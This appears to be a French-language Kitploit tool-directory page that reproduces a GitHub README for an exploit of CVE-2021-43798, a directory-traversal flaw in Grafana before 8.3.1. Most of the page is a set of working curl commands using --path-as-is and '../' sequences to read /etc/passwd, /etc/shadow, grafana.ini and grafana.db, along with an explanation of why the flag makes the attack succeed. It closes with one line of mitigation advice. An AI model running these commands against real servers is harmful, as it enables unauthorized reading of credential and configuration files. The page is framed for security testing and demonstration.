Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-43798 | Kitploit
Outils/GitHubGitHub/malekalthubiany/cve-2021-43798
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubmalekalthubiany/cve-2021-43798

CVE-2021-43798

Voir le dépôt
il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Grafana CVE-2021-43798 Exploit

Overview

Ce dépôt démontre l'exploitation de CVE-2021-43798, une vulnérabilité de traversée de répertoire dans Grafana. Cette vulnérabilité permet à des attaquants de lire des fichiers arbitraires sur le serveur.

Détails de la CVE

  • CVE: CVE-2021-43798
  • Description: Vulnérabilité de traversée de répertoire dans les versions de Grafana antérieures à 8.3.1.
  • Impact: Permet à des attaquants non authentifiés de lire des fichiers arbitraires sur le serveur.

Prérequis

  • Une version vulnérable de Grafana en cours d'exécution (avant 8.3.1)
  • Accès à l'instance Grafana cible

Exploitation

Utilisation de curl

Pour exploiter la vulnérabilité manuellement, vous pouvez utiliser l'une des commandes curl suivantes pour tenter de lire des fichiers sensibles :

root@kitploit:~
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

Pourquoi --path-as-is ?

Dans le contexte de l'exploitation de la vulnérabilité de traversée de répertoire CVE-2021-43798 dans Grafana, l'option --path-as-is est essentielle car elle permet d'envoyer directement au serveur, sans modification, les séquences de traversée spécialement conçues (../../../../../). Cela peut mener à l'accès à des fichiers sensibles situés en dehors du répertoire prévu sur le serveur.

Sans --path-as-is, curl pourrait normaliser le chemin en quelque chose comme /public/plugins/Users/install.txt, ce qui n'exploiterait pas la vulnérabilité. En utilisant --path-as-is, la séquence de traversée exacte est préservée, ce qui permet à l'exploit de réussir.

Référence de documentation

Vous pouvez trouver plus de détails sur l'option --path-as-is dans la documentation de curl. En comprenant et en utilisant --path-as-is, les professionnels de la sécurité et les chercheurs peuvent efficacement démontrer et tester les vulnérabilités de traversée de répertoire dans les applications web.

Atténuation

Pour atténuer cette vulnérabilité, mettez Grafana à jour vers la version 8.3.1 ou ultérieure.

Télécharger l’outil